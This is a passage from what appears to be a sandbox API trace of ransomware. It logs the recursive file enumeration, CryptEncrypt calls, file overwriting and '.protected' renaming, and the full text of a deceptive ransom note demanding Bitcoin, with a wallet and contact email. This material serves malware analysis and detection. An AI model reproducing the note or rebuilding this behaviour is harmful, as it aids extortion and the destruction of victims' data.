dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.836] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".txt") returned 0x0 [0058.836] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".rar") returned 0x0 [0058.836] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".zip") returned 0x0 [0058.836] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x391, lpOverlapped=0x0) returned 1 [0058.855] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.855] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x391, lpOverlapped=0x0) returned 1 [0058.855] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.856] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.856] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.856] CloseHandle (hObject=0xb4) returned 1 [0058.856] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.protected") returned 90 [0058.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.protected")) returned 1 [0058.856] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0058.856] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0058.857] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0058.857] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.857] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.857] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0058.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0058.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0058.857] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.876] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.876] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.876] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.876] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.876] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.876] CloseHandle (hObject=0xb4) returned 1 [0058.876] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0058.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0058.877] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0058.877] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0058.877] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0058.877] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0058.878] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.878] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0058.878] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0058.878] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0058.878] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.878] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0058.878] CloseHandle (hObject=0xa4) returned 1 [0058.879] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0058.879] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0058.879] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned 66 [0058.879] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0058.879] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0058.879] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*") returned 68 [0058.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0058.888] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.888] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.888] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.888] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.888] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.888] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.") returned 68 [0058.888] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.888] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0058.888] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0058.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.888] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.889] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.889] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.889] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.889] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.889] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.889] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.889] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..") returned 69 [0058.889] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.889] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.889] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0058.889] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0058.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.889] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.889] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned -1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0058.889] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0058.889] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned 71 [0058.889] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0058.889] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0058.889] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*") returned 73 [0058.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0058.890] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.890] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.890] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.890] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.890] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\.") returned 73 [0058.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.890] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0058.890] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.890] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.890] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.890] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.890] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\..") returned 74 [0058.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.890] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Windows") returned -1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Program Files") returned -1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Program Files (x86)") returned -1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="$Recycle.bin") returned 1 [0058.890] lstrcmpiW (lpString1="dwintl20.dll", lpString2="System Volume Information") returned -1 [0058.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.890] StrStrIW (lpFirst="dwintl20.dll", lpSrch=".protected") returned 0x0 [0058.890] lstrcmpW (lpString1="dwintl20.dll", lpString2="RESTORE_FILES.txt") returned -1 [0058.890] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0058.890] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0058.890] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0058.891] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.891] StrStrW (lpFirst="dwintl20.dll", lpSrch=".txt") returned 0x0 [0058.891] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.891] StrStrW (lpFirst="dwintl20.dll", lpSrch=".rar") returned 0x0 [0058.891] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0058.891] StrStrW (lpFirst="dwintl20.dll", lpSrch=".zip") returned 0x0 [0058.891] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0058.907] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.907] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0058.907] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.907] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0058.927] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0058.928] CloseHandle (hObject=0x150) returned 1 [0058.928] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.protected") returned 94 [0058.928] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.protected")) returned 1 [0058.928] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0058.928] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0058.928] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\RESTORE_FILES.txt") returned 89 [0058.928] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.929] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.929] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0058.929] lstrlenA 